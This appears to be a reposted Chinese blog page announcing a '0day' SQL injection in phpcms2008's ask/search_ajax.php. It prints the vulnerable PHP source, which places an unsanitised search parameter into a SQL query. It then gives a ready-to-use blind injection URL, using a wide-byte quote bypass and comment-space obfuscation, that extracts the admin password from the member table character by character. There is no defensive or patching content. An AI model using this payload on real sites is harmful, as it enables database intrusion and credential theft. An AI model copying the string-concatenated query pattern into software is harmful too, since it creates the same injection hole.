phpcms2008-0day(ask/search_ajax.php)

作者:110帮提
围观群众:55
更新于
phpcms2008-0day(ask/search_ajax.php)

漏洞文件:ask/search_ajax.php

phpcms2008-0day(ask/search_ajax.php)

code:

phpcms2008-0day(ask/search_ajax.php)

<?php
require './include/common.inc.php';
require_once MOD_ROOT.'include/ask.class.php';
$ask = new ask();
header('Content-type: text/html; charset=utf-8');
if(strtolower(CHARSET) != 'utf-8') $q = iconv(CHARSET, 'utf-8', $q);
if($q)
{
$where = " title LIKE '%$q%' AND status = 5";
}
else
{
exit('null');
}

$infos = $ask->listinfo($where, 'askid DESC', '', 10);

foreach($infos as $key=>$val)
{
$val['title'] = str_replace($q, '<span class="c_orange">'.$q.'</span>', $val['title']);
$info[$key]['title'] = CHARSET != 'utf-8' ? iconv(CHARSET, 'utf-8', $val['title']) : $val['title'];
$info[$key]['url'] = $val['url'];
}

echo(json_encode($info));
?>

测试方法:
ask/search_ajax.php?q=s%E6'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23

非特殊说明,本文版权归 宇德消息网 所有,转载请注明出处.

本文分类: 本周

本文标题: phpcms2008-0day(ask/search_ajax.php)

本文网址: http://www.tssjyd.com/benzhou/862.html

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

网站分类
搜索
最新留言
标签列表